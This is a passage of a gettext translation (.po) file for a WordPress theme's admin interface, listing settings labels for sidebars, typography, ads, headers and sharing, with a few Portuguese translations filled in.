of this post. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/panels/single-post.php:442 msgid "" "Select a position for the single sidebar. You can set an individual sidebar " "position for each post in the post editor page." msgstr "" #: backend/panels/privacy.php:22 msgid "Select a position to display the privacy box." msgstr "" #: backend/single-metaboxes.php:275 msgid "Select a Primary Category for this post." msgstr "" #: backend/panels/heading.php:67 backend/panels/heading.php:152 msgid "Select a primary color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:50 backend/panels/heading.php:135 msgid "Select a primary color for the heading." msgstr "" #: backend/panels/woocommerce.php:117 msgid "" "Select a sidebar for product category and archive pages if you enabled the " "sidebar." msgstr "" #: backend/panels/woocommerce.php:88 msgid "Select a sidebar for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/woocommerce.php:109 msgid "" "Select a sidebar position for product category and archive pages if you " "enabled the sidebar." msgstr "" #: backend/panels/blog-pages.php:306 backend/panels/blog-pages.php:793 #: backend/panels/blog-pages.php:1207 backend/panels/blog-pages.php:1615 #: backend/panels/bookmark.php:209 msgid "Select a sidebar position or disable it for the latest blog section" msgstr "" #: backend/category-settings.php:296 msgid "Select a sidebar position or disable it for the latest blog section." msgstr "" #: backend/panels/blog-pages.php:2107 msgid "Select a sidebar position or disable it for the search result listing." msgstr "" #: backend/panels/page.php:67 msgid "Select a sidebar position or disable it for the single page." msgstr "" #: backend/panels/bookmark.php:657 msgid "Select a sidebar position or disable it for this section." msgstr "" #: backend/panels/single-post.php:1556 msgid "Select a site header style for the single post." msgstr "" #: backend/single-metaboxes.php:114 msgid "Select a site header style for this page" msgstr "" #: backend/single-metaboxes.php:891 msgid "Select a site header style for this post." msgstr "" #: backend/panels/amp.php:329 backend/panels/amp.php:389 #: backend/panels/amp.php:449 backend/panels/amp.php:510 #: backend/panels/amp.php:570 msgid "Select a size for this ad." msgstr "" #: backend/panels/ads.php:142 backend/panels/ads.php:331 msgid "Select a size on the desktop device." msgstr "" #: backend/panels/ads.php:158 backend/panels/ads.php:347 msgid "Select a size on the mobile device." msgstr "" #: backend/panels/ads.php:150 backend/panels/ads.php:339 msgid "Select a size on the tablet device." msgstr "" #: backend/category-settings.php:283 msgid "Select a spacing between columns for the blog listing layout." msgstr "" #: backend/panels/blog-pages.php:283 backend/panels/blog-pages.php:770 #: backend/panels/blog-pages.php:1184 backend/panels/blog-pages.php:1592 #: backend/panels/blog-pages.php:2084 backend/panels/bookmark.php:187 #: backend/panels/bookmark.php:627 backend/panels/bookmark.php:635 msgid "Select a spacing between columns." msgstr "" #: backend/single-metaboxes.php:305 msgid "" "Select a standard layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/header-style.php:239 backend/panels/header-style.php:528 #: backend/panels/header-style.php:794 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header in the dark mode." msgstr "" #: backend/panels/header-style.php:161 backend/panels/header-style.php:450 #: backend/panels/header-style.php:716 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header." msgstr "" #: backend/panels/header-style.php:269 msgid "" "Select a text color for displaying in the navigation bar of the transparent " "header." msgstr "" #: backend/panels/header-style.php:203 backend/panels/header-style.php:492 #: backend/panels/header-style.php:758 msgid "" "Select a text color for displaying in the navigation bar of this header in " "the dark mode." msgstr "" #: backend/panels/header-style.php:125 backend/panels/header-style.php:413 #: backend/panels/header-style.php:680 msgid "" "Select a text color for displaying in the navigation bar of this header." msgstr "" #: backend/panels/header.php:494 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:441 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section." msgstr "" #: backend/category-settings.php:45 backend/panels/design.php:61 msgid "" "Select a text color for the entry category to display in the post listing in " "the dark mode." msgstr "" #: backend/category-settings.php:38 backend/panels/design.php:53 msgid "" "Select a text color for the entry category to display in the post listing. " "Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:474 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header in the dark mode." msgstr "" #: backend/panels/header.php:421 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header." msgstr "" #: backend/panels/footer.php:62 msgid "Select a text color scheme for the footer." msgstr "" #: backend/panels/header.php:285 msgid "Select a text color scheme to fit with the sub menu background." msgstr "" #: backend/panels/header-style.php:211 backend/panels/header-style.php:247 #: backend/panels/header-style.php:500 backend/panels/header-style.php:536 #: backend/panels/header-style.php:766 backend/panels/header-style.php:802 msgid "Select a text color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:133 backend/panels/header-style.php:169 #: backend/panels/header-style.php:277 backend/panels/header-style.php:421 #: backend/panels/header-style.php:458 backend/panels/header-style.php:688 #: backend/panels/header-style.php:724 msgid "Select a text color when hovering." msgstr "" #: backend/category-settings.php:434 backend/panels/block-classic.php:121 #: backend/panels/block-grid.php:121 backend/panels/block-grid.php:286 #: backend/panels/block-grid.php:451 backend/panels/block-grid.php:624 #: backend/panels/block-grid.php:811 backend/panels/block-list.php:129 #: backend/panels/block-list.php:302 backend/panels/block-list.php:483 #: backend/panels/block-list.php:678 backend/panels/blog-pages.php:461 #: backend/panels/blog-pages.php:948 backend/panels/blog-pages.php:1362 #: backend/panels/blog-pages.php:1770 backend/panels/blog-pages.php:2262 #: backend/panels/bookmark.php:360 backend/panels/bookmark.php:808 msgid "Select a title HTML tag for the post title." msgstr "" #: backend/panels/heading.php:113 msgid "Select a title HTML tag for the sidebar widget heading." msgstr "" #: backend/panels/ads.php:238 msgid "Select a top and bottom spacing for the advert." msgstr "" #: backend/single-metaboxes.php:57 msgid "" "Select a top header style for this page. This option is used for the single " "page (not Elementor page)." msgstr "" #: backend/single-metaboxes.php:504 msgid "Select a type of review for this post." msgstr "" #: backend/single-metaboxes.php:323 msgid "" "Select a video layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:604 msgid "Select a website header style for the blog page." msgstr "" #: backend/panels/blog-pages.php:38 msgid "Select a website header style for the category pages." msgstr "" #: backend/panels/blog-pages.php:1922 msgid "Select a website header style for the search page." msgstr "" #: backend/panels/header-style.php:57 backend/panels/header-style.php:351 #: backend/panels/header-style.php:602 msgid "Select a width style for this header." msgstr "" #: backend/panels/ads.php:78 msgid "Select ad settings for displaying at the top of your website." msgstr "" #: backend/panels/ads.php:266 msgid "Select ad settings for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:16 msgid "Select ad settings for your website." msgstr "" #: backend/panels/header.php:699 msgid "Select background color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:683 msgid "Select background color for the bar." msgstr "" #: backend/panels/blog-pages.php:1560 msgid "Select blog listing layout for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1152 msgid "Select blog listing layout for the author pages." msgstr "" #: backend/panels/blog-pages.php:738 msgid "Select blog listing layout for the blog." msgstr "" #: backend/panels/blog-pages.php:251 msgid "Select blog listing layout for the category pages." msgstr "" #: backend/panels/bookmark.php:155 msgid "Select blog listing layout for the saved pages." msgstr "" #: backend/panels/blog-pages.php:2052 msgid "Select blog listing layout for the search result listing." msgstr "" #: backend/category-settings.php:239 msgid "Select blog listing layout for this category." msgstr "" #: backend/panels/bookmark.php:595 msgid "Select blog listing layout for this section." msgstr "" #: backend/panels/color.php:16 msgid "" "Select colors for your website. To organize the panel and make it easy to " "use, you may also see color settings for each elements in it's panel." msgstr "" #: backend/panels/header.php:127 msgid "Select columns per row for this section." msgstr "" #: backend/panels/color.php:66 msgid "Select dark accent color in the dark mode." msgstr "" #: backend/panels/block-classic.php:148 backend/panels/block-grid.php:148 #: backend/panels/block-grid.php:313 backend/panels/block-grid.php:478 #: backend/panels/block-grid.php:651 backend/panels/block-grid.php:838 #: backend/panels/block-list.php:156 backend/panels/block-list.php:329 #: backend/panels/block-list.php:510 backend/panels/block-list.php:705 msgid "" "Select entry meta tags you would like to hide on the mobile devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/block-classic.php:139 backend/panels/block-grid.php:139 #: backend/panels/block-grid.php:304 backend/panels/block-grid.php:469 #: backend/panels/block-grid.php:642 backend/panels/block-grid.php:829 #: backend/panels/block-list.php:147 backend/panels/block-list.php:320 #: backend/panels/block-list.php:501 backend/panels/block-list.php:696 msgid "" "Select entry meta tags you would like to hide on the tablet devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/bookmark.php:404 msgid "" "Select entry meta you would like to hide on the mobile devices. In case long " "meta it would be useful." msgstr "" #: backend/panels/typography.php:999 msgid "" "Select font for mobile quick access menu items for displaying in the mobile " "device." msgstr "" #: backend/panels/typography.php:925 msgid "Select font for sub-level menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:970 msgid "Select font for sub-level menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:1112 msgid "Select font for the default archives, categories and menu fonts." msgstr "" #: backend/panels/typography.php:424 msgid "Select font for the entry category element." msgstr "" #: backend/panels/typography.php:124 msgid "" "Select font for the H1 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:173 msgid "" "Select font for the H2 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:222 msgid "" "Select font for the H3 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:271 msgid "" "Select font for the H4 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:320 msgid "" "Select font for the H5 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:369 msgid "" "Select font for the H6 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:581 msgid "" "Select font for the input, textarea and button. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:909 msgid "Select font for top menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:954 msgid "Select font for top menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:78 msgid "Select font sizes for the excerpt in the post listing." msgstr "" #: backend/panels/typography.php:473 msgid "" "Select font values for entry meta info: date, view, comment... Those options " "will not apply to the author meta." msgstr "" #: backend/panels/typography.php:896 msgid "Select font values for menus on the website header." msgstr "" #: backend/panels/typography.php:686 msgid "" "Select font values for Single Headline (Single Post Title) and Single " "Tagline (Single Sub Title)." msgstr "" #: backend/panels/typography.php:489 msgid "" "Select font values for the author, category meta, review description and " "sponsored brand." msgstr "" #: backend/panels/typography.php:1033 msgid "Select font values for the block heading." msgstr "" #: backend/panels/typography.php:813 msgid "Select font values for the block quote." msgstr "" #: backend/panels/typography.php:848 msgid "" "Select font values for the breadcrumb bar. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:1099 msgid "" "Select font values for the default widgets, apply to the archive, category " "widgets..." msgstr "" #: backend/panels/typography.php:418 msgid "" "Select font values for the entry category (category icon) in the post " "listing." msgstr "" #: backend/panels/typography.php:130 msgid "Select font values for the H1 tag and [ CSS classname: .h1]" msgstr "" #: backend/panels/typography.php:179 msgid "Select font values for the H2 tag and [ CSS classname: .h2]" msgstr "" #: backend/panels/typography.php:228 msgid "Select font values for the H3 tag and [ CSS classname: .h3]" msgstr "" #: backend/panels/typography.php:277 msgid "Select font values for the H4 tag and [ CSS classname: .h4]" msgstr "" #: backend/panels/typography.php:326 msgid "Select font values for the H5 tag and [ CSS classname: .h5]" msgstr "" #: backend/panels/typography.php:375 msgid "Select font values for the H6 tag and [ CSS classname: .h6]" msgstr "" #: backend/panels/typography.php:467 msgid "" "Select font values for the post entry meta. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:539 msgid "Select font values for the read more button" msgstr "" #: backend/panels/typography.php:533 msgid "Select font values for the read more button." msgstr "" #: backend/panels/typography.php:705 msgid "" "Select font values for the single headline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:762 msgid "" "Select font values for the single tagline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:30 msgid "" "Select font values for your website. The settings below apply to almost " "content elements on the website." msgstr "" #: backend/panels/bookmark.php:30 msgid "Select general settings for the bookmark system." msgstr "" #: backend/panels/design.php:569 msgid "Select hover effect settings for your website." msgstr "" #: backend/panels/single-post.php:30 msgid "Select layouts for the single post that based on the post formats." msgstr "" #: backend/category-settings.php:409 backend/panels/block-classic.php:91 #: backend/panels/block-grid.php:91 backend/panels/block-grid.php:256 #: backend/panels/block-grid.php:421 backend/panels/block-grid.php:594 #: backend/panels/block-grid.php:781 backend/panels/block-list.php:99 #: backend/panels/block-list.php:272 backend/panels/block-list.php:453 #: backend/panels/block-list.php:648 backend/panels/blog-pages.php:436 #: backend/panels/blog-pages.php:923 backend/panels/blog-pages.php:1337 #: backend/panels/blog-pages.php:1745 backend/panels/blog-pages.php:2237 #: backend/panels/bookmark.php:335 backend/panels/bookmark.php:783 msgid "select max length of the post excerpt." msgstr "" #: backend/panels/header.php:204 msgid "Select mode for the search button when clicking on." msgstr "" #: backend/single-metaboxes.php:130 msgid "Select navigation bar style for the header of this page." msgstr "" #: backend/single-metaboxes.php:907 msgid "Select navigation bar style for the header of this post." msgstr "" #: backend/panels/blog-pages.php:612 msgid "Select navigation bar style for the site header in the blog index page." msgstr "" #: backend/panels/blog-pages.php:46 msgid "Select navigation bar style for the site header in the category pages." msgstr "" #: backend/panels/blog-pages.php:1930 msgid "Select navigation bar style for the site header in the search page." msgstr "" #: backend/panels/header-style.php:69 backend/panels/header-style.php:614 msgid "Select navigation bar style for these header styles." msgstr "" #: backend/panels/single-post.php:1362 msgid "Select number of posts to show at once." msgstr "" #: backend/panels/woocommerce.php:72 msgid "" "Select number of products per page, leave blank if you want to set as " "Settings default." msgstr "" #: backend/panels/login.php:13 msgid "Select option for the login screen page." msgstr "" #: backend/panels/single-post.php:157 msgid "Select options for content area." msgstr "" #: backend/panels/single-post.php:1426 msgid "Select options for the ajax load next posts feature." msgstr "" #: backend/panels/header.php:115 msgid "" "Select options for the more menu and enable/disable it for each header style." msgstr "" #: backend/panels/privacy.php:8 msgid "Select options for the privacy notice bar." msgstr "" #: backend/panels/reaction.php:17 msgid "Select options for the reaction section." msgstr "" #: backend/panels/single-post.php:1251 msgid "" "Select options for the related and popular section at the footer of the " "single post page." msgstr "" #: backend/panels/single-post.php:1158 msgid "Select options for the review system." msgstr "" #: backend/panels/woocommerce.php:45 msgid "Select options for the shop and archive and single product pages." msgstr "" #: backend/panels/woocommerce.php:29 msgid "Select options for the shop." msgstr "" #: backend/panels/footer.php:16 msgid "" "Select options for your website footer. Navigate to Appearance > Widgets to " "add widgets to footer sections." msgstr "" #: backend/panels/header.php:17 msgid "Select options for your website header." msgstr "" #: backend/panels/optimized.php:15 msgid "Select options to optimize your website speed." msgstr "" #: backend/panels/logo.php:55 msgid "" "Select or upload a light logo for displaying in the dark mode. It should be " "same dimensions with the site logo." msgstr "" #: backend/panels/logo.php:71 msgid "" "Select or upload a light retina logo for displaying in the dark mode. It " "should be same dimensions with the retina site logo" msgstr "" #: backend/panels/logo.php:150 msgid "Select or upload bookmarklet icons for iOS and Android devices." msgstr "" #: backend/panels/logo.php:86 msgid "Select or upload logos for displaying in the mobile device." msgstr "" #: backend/panels/logo.php:116 msgid "Select or upload logos for displaying in the transparent headers." msgstr "" #: backend/panels/logo.php:63 msgid "" "Select or upload retina (2x) logo. Recommended logo height value is 120px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/logo.php:47 msgid "" "Select or upload site logo. Recommended logo height value is 60px, allowed " "extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/blog-pages.php:1857 msgid "Select pagination type for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1449 msgid "Select pagination type for the author pages." msgstr "" #: backend/panels/blog-pages.php:1036 msgid "Select pagination type for the blog." msgstr "" #: backend/panels/blog-pages.php:548 msgid "Select pagination type for the category pages." msgstr "" #: backend/panels/blog-pages.php:2349 msgid "Select pagination type for the search result listing." msgstr "" #: backend/category-settings.php:226 msgid "Select pagination type for this category." msgstr "" #: backend/panels/bookmark.php:570 msgid "Select pagination type for this section." msgstr "" #: backend/panels/design.php:255 msgid "Select position for the custom meta label at the beginning or end." msgstr "" #: backend/panels/design.php:314 msgid "Select position to crop the featured image." msgstr "" #: backend/panels/blog-pages.php:1538 msgid "" "Select posts per page for the archives. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:1129 msgid "" "Select posts per page for the authors. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:714 msgid "" "Select posts per page for the blog. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:178 msgid "" "Select posts per page for the categories. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:2030 msgid "" "Select posts per page for the search result listing. Leave this option blank " "to set the default." msgstr "" #: backend/category-settings.php:170 msgid "" "Select posts per page for this category. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:562 msgid "Select posts per page for this section." msgstr "" #: backend/single-metaboxes.php:271 msgid "Select Primary Category" msgstr "" #: backend/panels/reaction.php:38 msgid "Select reaction items you would like to show." msgstr "" #: backend/panels/optimized.php:108 msgid "" "Select SEO options for your website. This panel helps your website optimized " "for SEO and appear better on the search engines." msgstr "" #: backend/panels/amp.php:278 msgid "Select setting for ads in AMP mode." msgstr "" #: backend/panels/amp.php:248 msgid "Select setting for auto ads in AMP mode." msgstr "" #: backend/panels/amp.php:172 msgid "Select setting for the single post your website in AMP mode." msgstr "" #: backend/panels/amp.php:29 backend/panels/amp.php:41 msgid "Select setting for your website in AMP mode." msgstr "" #: backend/panels/design.php:419 msgid "Select settings for post sliders on your website." msgstr "" #: backend/panels/header.php:176 msgid "Select settings for search form to display in the website header." msgstr "" #: backend/panels/table-contents.php:16 msgid "Select settings for table of contents." msgstr "" #: backend/panels/bookmark.php:16 msgid "Select settings for the bookmark system." msgstr "" #: backend/panels/single-post.php:1205 msgid "Select settings for the comment box." msgstr "" #: backend/panels/dark-mode.php:17 msgid "Select settings for the dark mode." msgstr "" #: backend/panels/single-post.php:472 msgid "Select settings for the entry category." msgstr "" #: backend/category-settings.php:346 backend/panels/block-classic.php:50 #: backend/panels/block-grid.php:50 backend/panels/block-grid.php:215 #: backend/panels/block-grid.php:380 backend/panels/block-grid.php:553 #: backend/panels/block-grid.php:740 backend/panels/block-list.php:58 #: backend/panels/block-list.php:231 backend/panels/block-list.php:412 #: backend/panels/block-list.php:607 backend/panels/blog-pages.php:375 #: backend/panels/blog-pages.php:862 backend/panels/blog-pages.php:1276 #: backend/panels/blog-pages.php:1684 backend/panels/blog-pages.php:2176 #: backend/panels/bookmark.php:274 backend/panels/bookmark.php:722 msgid "Select settings for the entry meta bar." msgstr "" #: backend/panels/newsletter.php:15 msgid "Select settings for the popup newsletter." msgstr "" #: backend/panels/header.php:520 msgid "Select settings for the popup sign in form." msgstr "" #: backend/category-settings.php:398 msgid "Select settings for the post excerpt." msgstr "" #: backend/panels/design.php:296 msgid "Select settings for the post featured image on your website." msgstr "" #: backend/panels/design.php:536 msgid "" "Select settings for the read more button on your website. You can " "enable/disable this part per module via Modules Design section." msgstr "" #: backend/panels/bookmark.php:90 msgid "Select settings for the reading list section." msgstr "" #: backend/panels/bookmark.php:504 msgid "Select settings for the recommended section." msgstr "" #: backend/panels/single-post.php:426 msgid "Select settings for the single sidebar." msgstr "" #: backend/panels/single-post.php:1125 msgid "Select settings for the sponsored posts." msgstr "" #: backend/panels/bookmark.php:440 msgid "Select settings for the user interests section." msgstr "" #: backend/panels/design.php:471 msgid "Select settings for your post entry meta." msgstr "" #: backend/panels/sidebar.php:8 msgid "" "Select settings for your website sidebars, The settings below apply to all " "sidebars." msgstr "" #: backend/panels/woocommerce.php:80 msgid "Select sidebar position for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/single-post.php:692 msgid "Select socials you would like to show the share button." msgstr "" #: backend/panels/single-post.php:562 msgid "Select styles, layouts and other settings for the single post meta." msgstr "" #: backend/panels/woocommerce.php:173 msgid "Select styling options of your shop." msgstr "" #: backend/panels/header.php:707 msgid "Select text color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:691 msgid "Select text color for the bar." msgstr "" #: backend/panels/sidebar.php:27 msgid "Select the default sidebar position for your website." msgstr "" #: backend/panels/header.php:51 msgid "Select the global header style for your website header." msgstr "" #: backend/panels/header.php:34 msgid "Select the style and other settings for your website header." msgstr "" #: backend/category-settings.php:259 msgid "" "Select total columns to show per row for the blog listing layout on the " "desktop device." msgstr "" #: backend/category-settings.php:275 msgid "" "Select total columns to show per row for the blog listing layout on the " "mobile device." msgstr "" #: backend/category-settings.php:267 msgid "" "Select total columns to show per row for the blog listing layout on the " "tablet device." msgstr "" #: backend/panels/blog-pages.php:275 backend/panels/blog-pages.php:762 #: backend/panels/blog-pages.php:1176 backend/panels/blog-pages.php:1584 #: backend/panels/blog-pages.php:2076 backend/panels/bookmark.php:179 #: backend/panels/bookmark.php:619 msgid "Select total columns to show per row on the mobile device." msgstr "" #: backend/panels/blog-pages.php:267 backend/panels/blog-pages.php:754 #: backend/panels/blog-pages.php:1168 backend/panels/blog-pages.php:1576 #: backend/panels/blog-pages.php:2068 backend/panels/bookmark.php:171 #: backend/panels/bookmark.php:611 msgid "Select total columns to show per row on the tablet device." msgstr "" #: backend/panels/blog-pages.php:259 backend/panels/blog-pages.php:746 #: backend/panels/blog-pages.php:1160 backend/panels/blog-pages.php:1568 #: backend/panels/blog-pages.php:2060 backend/panels/bookmark.php:163 #: backend/panels/bookmark.php:603 msgid "Select total columns to show per row." msgstr "" #: backend/panels/woocommerce.php:148 msgid "" "Select total related product to show at once. leave blank if you want to set " "as default." msgstr "" #: backend/panels/amp.php:482 backend/panels/amp.php:542 msgid "Select your ad type to display at the bottom single content." msgstr "" #: backend/panels/amp.php:361 msgid "Select your ad type to display at the footer." msgstr "" #: backend/panels/amp.php:301 msgid "Select your ad type to display at the header." msgstr "" #: backend/panels/amp.php:421 msgid "Select your ad type to display at the top single content." msgstr "" #: backend/single-metaboxes.php:398 msgid "Self-Hosted Audio" msgstr "" #: backend/single-metaboxes.php:350 msgid "Self-Hosted Video" msgstr "" #: backend/panels/optimized.php:107 msgid "SEO Optimized" msgstr "" #: backend/panels/optimized.php:115 msgid "SEO Snippets" msgstr "" #: backend/panels/dark-mode.php:43 msgid "" "Set the dark mode as the default color scheme when users visit your website " "a the first time." msgstr "" #: backend/panels/ads.php:287 msgid "Setup below settings corresponding to your ad type." msgstr "" #: backend/panels/design.php:231 msgid "" "Setup your custom meta to display in the post listing and single post page." msgstr "" #: backend/configs.php:875 backend/panels/blog-pages.php:50 #: backend/panels/blog-pages.php:616 backend/panels/blog-pages.php:1934 #: backend/panels/header-style.php:71 backend/panels/header-style.php:616 #: backend/single-metaboxes.php:133 backend/single-metaboxes.php:910 msgid "Shadow" msgstr "" #: templates/single/templates.php:269 msgid "SHARE" msgstr "" #: templates/single/templates.php:323 templates/single/templates.php:1532 msgid "Share" msgstr "Compartilhar" #: backend/panels/single-post.php:1507 msgid "Share on Facebook" msgstr "" #: backend/panels/single-post.php:1523 msgid "Share on Reddit" msgstr "" #: backend/panels/single-post.php:690 msgid "Share on Socials" msgstr "" #: backend/panels/single-post.php:1515 msgid "Share on Twitter" msgstr "" #: templates/single/templates.php:808 msgid "Share this Article" msgstr "" #: backend/panels/woocommerce.php:102 msgid "Shop - Archive Pages Options" msgstr "" #: backend/panels/woocommerce.php:54 msgid "Shop Page Options" msgstr "" #: backend/panels/woocommerce.php:87 msgid "Shop Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:79 msgid "Shop Sidebar Position" msgstr "" #: backend/panels/optimized.php:182 msgid "" "Short description will display when searching your main site URL. Leave " "blank if you use 3rd plugins." msgstr "" #: backend/panels/header.php:732 msgid "Show a cart icon at the website header." msgstr "" #: backend/panels/single-post.php:1565 msgid "" "Show a font size icon that give visitors of your site the option to change " "the font size of your text." msgstr "" #: backend/panels/footer.php:54 msgid "Show a gray border a the top footer." msgstr "" #: backend/panels/design.php:550 msgid "Show a icon after the read more label." msgstr "" #: backend/panels/ads.php:455 msgid "Show ads or any shortcode in the slide up footer section." msgstr "" #: backend/panels/single-post.php:1441 msgid "Show Continue Reading" msgstr "" #: backend/panels/footer.php:107 msgid "Show gray borders between widget columns." msgstr "" #: backend/panels/table-contents.php:148 msgid "Show Hierarchy" msgstr "" #: backend/category-settings.php:144 backend/panels/blog-pages.php:134 #: backend/panels/blog-pages.php:671 msgid "Show in all pages" msgstr "" #: backend/category-settings.php:143 backend/panels/blog-pages.php:133 #: backend/panels/blog-pages.php:670 msgid "Show in the first page" msgstr "" #: backend/panels/header.php:739 msgid "Show mini cart icon in the header." msgstr "" #: backend/panels/header.php:747 msgid "Show mini cart icon in the mobile header." msgstr "" #: backend/panels/single-post.php:1373 includes/menu.php:244 #: includes/menu.php:297 templates/header/templates.php:701 #: templates/parts.php:326 msgid "Show More" msgstr "" #: backend/panels/table-contents.php:156 msgid "Show Number list" msgstr "" #: backend/panels/woocommerce.php:181 msgid "Show Percentage Saved" msgstr "" #: backend/panels/woocommerce.php:137 msgid "Show Review Box" msgstr "" #: backend/panels/header.php:223 msgid "Show search form at the top of the more section." msgstr "" #: backend/panels/single-post.php:1604 msgid "Show Share Bar" msgstr "" #: backend/category-settings.php:139 backend/panels/blog-pages.php:130 #: backend/panels/blog-pages.php:667 msgid "Show template in the first or all pages." msgstr "" #: backend/panels/design.php:104 msgid "Show the \"posted\" text before the post author meta." msgstr "" #: backend/panels/single-post.php:593 msgid "Show the \"posted\" text before the single post author meta." msgstr "" #: backend/panels/design.php:118 msgid "Show the clock icon before the post updated meta." msgstr "" #: backend/panels/design.php:338 msgid "Show the edit post link in the featured image for logged users." msgstr "" #: backend/panels/design.php:146 msgid "Show the icon before the post category meta." msgstr "" #: backend/panels/design.php:125 msgid "Show the icon before the post comment meta." msgstr "" #: backend/panels/design.php:111 msgid "Show the icon before the post date meta." msgstr "" #: backend/panels/design.php:132 msgid "Show the icon before the post view meta." msgstr "" #: backend/panels/design.php:139 msgid "Show the icon before the reading time meta." msgstr "" #: backend/panels/single-post.php:1492 msgid "" "Show the popup shares bar when the user highlight text in the post content." msgstr "" #: backend/panels/single-post.php:1212 backend/panels/single-post.php:1473 msgid "Show/Hide Comment Button" msgstr "" #: templates/blog.php:233 #, php-format msgid "Showing %s results for your search" msgstr "Mostrando %s resultados para sua pesquisa" #: backend/panels/reaction.php:54 msgid "Shy" msgstr "" #: backend/panels/ads.php:477 msgid "Side Up Expired" msgstr "" #: backend/panels/typography.php:1105 msgid "Sidebar Archive & Menu Widgets" msgstr "" #: backend/panels/page.php:60 backend/panels/sidebar.php:7 #: backend/panels/single-post.php:424 backend/single-metaboxes.php:83 #: backend/single-metaboxes.php:442 msgid "Sidebar Area" msgstr "" #: backend/category-settings.php:295 backend/panels/blog-pages.php:305 #: backend/panels/blog-pages.php:792 backend/panels/blog-pages.php:1206 #: backend/panels/blog-pages.php:1614 backend/panels/blog-pages.php:2106 #: backend/panels/bookmark.php:208 backend/panels/bookmark.php:656 #: backend/panels/page.php:66 backend/panels/single-post.php:441 #: backend/single-metaboxes.php:88 backend/single-metaboxes.php:447 msgid "Sidebar Position" msgstr "" #: backend/panels/amp.php:231 msgid "Sidebar Section" msgstr "" #: backend/panels/heading.php:90 msgid "Sidebar Widget Heading" msgstr "" #: backend/panels/header.php:532 templates/header/templates.php:315 #: templates/header/templates.php:317 templates/header/templates.php:616 #: templates/popup.php:191 msgid "Sign In" msgstr "Entrar" #: templates/parts.php:825 msgid "Sign In to Follow" msgstr "" #: bookmark/template-helpers.php:59 msgid "Sign In to Save" msgstr "" #: backend/panels/header.php:567 msgid "Sign in to your account" msgstr "" #: templates/header/templates.php:310 msgid "Sign Out" msgstr "Sair" #: backend/panels/single-post.php:343 msgid "Sign Up For Daily Newsletter" msgstr "" #: backend/configs.php:561 backend/panels/blog-pages.php:1453 #: backend/panels/blog-pages.php:1861 msgid "Simple" msgstr "" #: includes/sidebars.php:164 msgid "Single Content - Bottom Area" msgstr "" #: includes/sidebars.php:155 msgid "Single Content - Top Area" msgstr "" #: backend/panels/typography.php:692 msgid "Single Headline Fonts (Post Title)" msgstr "" #: backend/panels/single-post.php:44 msgid "Single Layout" msgstr "" #: backend/panels/page.php:16 msgid "Single Page" msgstr "" #: backend/panels/breadcrumb.php:61 msgid "Single Page Breadcrumb" msgstr "" #: backend/single-metaboxes.php:44 msgid "Single Page Settings" msgstr "" #: backend/panels/amp.php:171 backend/panels/single-post.php:14 #: backend/panels/typography.php:683 msgid "Single Post" msgstr "" #: backend/panels/breadcrumb.php:50 msgid "Single Post Breadcrumb" msgstr "" #: backend/panels/woocommerce.php:131 msgid "Single Product Page" msgstr "" #: backend/panels/single-post.php:514 msgid "Single Tagline" msgstr "" #: backend/panels/typography.php:749 msgid "Single Tagline Fonts (Sub Title)" msgstr "" #: backend/single-metaboxes.php:167 backend/single-metaboxes.php:944 msgid "Site Footer" msgstr "" #: backend/category-settings.php:51 backend/panels/blog-pages.php:31 #: backend/panels/blog-pages.php:597 backend/panels/blog-pages.php:1915 #: backend/panels/single-post.php:1540 backend/single-metaboxes.php:107 #: backend/single-metaboxes.php:113 msgid "Site Header" msgstr "" #: backend/panels/optimized.php:129 msgid "Sitelinks Search Box" msgstr "" #: templates/parts.php:615 msgid "Skype" msgstr "" #: backend/panels/socials.php:80 msgid "Skype URL" msgstr "" #: backend/configs.php:846 msgid "Skyscraper (120x600)" msgstr 